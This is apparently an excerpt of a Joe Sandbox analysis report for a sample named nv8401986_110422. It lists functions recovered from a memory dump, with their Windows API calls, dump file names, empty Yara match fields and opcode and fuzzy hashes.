                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00597C84), ref: 0041C1AE
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0041C1CA
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00597C84), ref: 0041C1E5
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00597C84), ref: 0041C246
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: a006bf084aaf4b5e101dc5f2a51e9c07270f9802790f3c0861aa6c33e20d5ae5
                                                                                                                                                                                                          • Instruction ID: e4ff037c1e074eaef1e462576e27eb7f9e701e57f15d395cb24d58d2077de5ab
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a006bf084aaf4b5e101dc5f2a51e9c07270f9802790f3c0861aa6c33e20d5ae5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC31DE70958249DBCB21CFA8DD097D9BFF4FB18724F10829BE815A7380D7B51A449B81
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 0049C1EB
                                                                                                                                                                                                          • GetCaretBlinkTime.USER32(00000000), ref: 0049C209
                                                                                                                                                                                                          • SetTimer.USER32(?,?,00000000), ref: 0049C216
                                                                                                                                                                                                          • ShowCaret.USER32(?), ref: 0049C226
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Caret$BlinkShowTimeTimerWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 669903483-0
                                                                                                                                                                                                          • Opcode ID: ab45ce15f426f730a8d74a4f1f16a0c4c9778292bc8ccc5b3fbc602e68351fc4
                                                                                                                                                                                                          • Instruction ID: 99db7e4a554883cef2b953eaab7c5161214fad1baa6cdc75bbd3fb7278538406
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab45ce15f426f730a8d74a4f1f16a0c4c9778292bc8ccc5b3fbc602e68351fc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F015366046109BDE202F6DFC48BD73AACEB29326B000A79B442D21B1CB25D889AB50
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00422590: CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00422671
                                                                                                                                                                                                            • Part of subcall function 00422590: CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00422705
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0042250D
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 00422514
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Event$Create
                                                                                                                                                                                                          • String ID: dllquery
                                                                                                                                                                                                          • API String ID: 1287507382-3762084462
                                                                                                                                                                                                          • Opcode ID: 844db3ba58ae8aa231536162d5408f5bd4ffb248e7e307de069a5294f40f383b
                                                                                                                                                                                                          • Instruction ID: a63fc1301ba6287be8cfae0cfd820a5b2089b576439e38f84b321128d0625f5d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844db3ba58ae8aa231536162d5408f5bd4ffb248e7e307de069a5294f40f383b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48313771A00108ABEB04EFA8EE49BEDBB71FF45314F608629F401A72C1DB795A84CB55
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,EFE0703F,?,?,0054B140,000000FF), ref: 0046E281
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID: 0F$@F
                                                                                                                                                                                                          • API String ID: 3664257935-854975247
                                                                                                                                                                                                          • Opcode ID: e60468d8558ab10ed23c37b5807159761484d6180806933727f095259a2dadcb
                                                                                                                                                                                                          • Instruction ID: 71f482a42453dca0316d7d1724b4bafe9a8805fb4aae109ca3ec81d8c884bcfa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e60468d8558ab10ed23c37b5807159761484d6180806933727f095259a2dadcb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16018175504708ABE3118F08D905B9ABBE8FB09714F00866AEC5597780E7B99904CB90
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046E19F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                          • String ID: se$spon
                                                                                                                                                                                                          • API String ID: 190572456-1233149680
                                                                                                                                                                                                          • Opcode ID: a18cd38359c5d619c84d42f346176a8ecf3405a003b961118e237ec072f871c9
                                                                                                                                                                                                          • Instruction ID: b09cfb9e6fa65308120aff59ceb31b5997679d01bd5d3a0a7ffbfa3232e5ab9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a18cd38359c5d619c84d42f346176a8ecf3405a003b961118e237ec072f871c9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF0A435E04248EFD700DFA9C8057AEF7F8EF59210F00815DE845A7250EB70AA459BA5